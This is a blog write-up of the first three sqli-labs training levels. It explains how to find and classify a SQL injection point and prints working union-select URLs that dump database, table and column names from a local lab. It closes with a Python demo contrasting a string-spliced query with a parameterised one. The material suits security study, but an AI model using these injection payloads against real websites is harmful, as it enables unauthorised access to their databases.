Summary of the first three passes of sqli Labs
2022-07-02 15:27:00 【[email protected]】
Approach
First, we need to determine whether a SQL injection vulnerability exists and locate the injection point. SQL injection usually comes in two types, integer (numeric) injection and string (character) injection; to tell which one we are dealing with, we analyze the error messages. Append `--+` to comment out the rest of the SQL statement and judge the type by whether the page still echoes normally. Then use an `order by` clause to determine how many columns the table has. Next, change `id=1` to an id value that does not exist in the database, such as `-1`, and use the joint query `union select 1,2,3` to see whether the page has display positions. Finally, dump the database name, then the table names, then the column names.
Dump the database name
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database()--+
Dump the table names
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Dump the column names
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
Summary
group_concat() function
group_concat() takes the rows that belong to the same group and concatenates the values of the chosen column into a single string. Which column is returned is decided by the function argument (the field name). Grouping needs a criterion, which is the column specified by group by. In short, it splices the results of a SQL statement together into one value.
--
In SQL, `--` starts a comment, but MySQL only treats it as one when a space follows it, and if you put `-- ` at the end of a URL the browser trims the trailing space when it sends the request. So we use `--+` instead of `--`, because `+` is decoded into a space by URL decoding.
order by
Use an order by clause to determine how many columns the table has (the judgment is whether the page still echoes normally).
union
Combines two result sets, excludes duplicate rows, and sorts by the default rules: after the tables are joined, union filters out duplicate records, so the generated result set is sorted, duplicates are deleted, and the result is returned. In this challenge, the select clause on the left of the union returns an empty result, so the union query on the right naturally becomes the first row and is printed on the web page. Changing id to -1 makes the statement before the union produce no result, so the statement after it is what gets executed and displayed.
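As an added example (not code from the original post or from sqli-labs), the Less-2 style query is rebuilt on an in-memory sqlite3 table in Python, with the string-spliced form beside a parameterised form, so the page's `id=-1 union select ...` probe and `order by` probe can be run against both; the table contents are constructed, and sqlite3 stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users table (assumption: sqlite3 in place of MySQL).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con

def lookup_vulnerable(con, id_param):
    # Mirrors Less-2: the id parameter is spliced into the SQL text, i.e. integer injection.
    # sqlite accepts a bare "--" comment; MySQL needs "-- " with a space, hence "--+" in URLs.
    sql = f"SELECT id, username, password FROM users WHERE id={id_param} LIMIT 1"
    return con.execute(sql).fetchone()

def lookup_hardened(con, id_param):
    # Reject anything that is not an integer, then bind the value; it never becomes SQL text,
    # so a union probe can neither add rows nor comment out the LIMIT.
    try:
        id_int = int(id_param)
    except ValueError:
        return None
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return con.execute(sql, (id_int,)).fetchone()

def probe_errors(con, id_param):
    # The page's "order by N" test: True when the database rejects the query because N
    # exceeds the column count, which is what the broken page echo reveals.
    try:
        lookup_vulnerable(con, id_param)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    probe = "-1 union select 1,2,group_concat(username) from users--"
    print("vulnerable:", lookup_vulnerable(db, probe))  # injected row fills the display positions
    print("hardened:  ", lookup_hardened(db, probe))    # None: the probe is not an integer
    print("order by 4 errors:", probe_errors(db, "1 order by 4"))
```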
Copyright notice
This article was written by [[email protected]]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/02/202202151501338110.html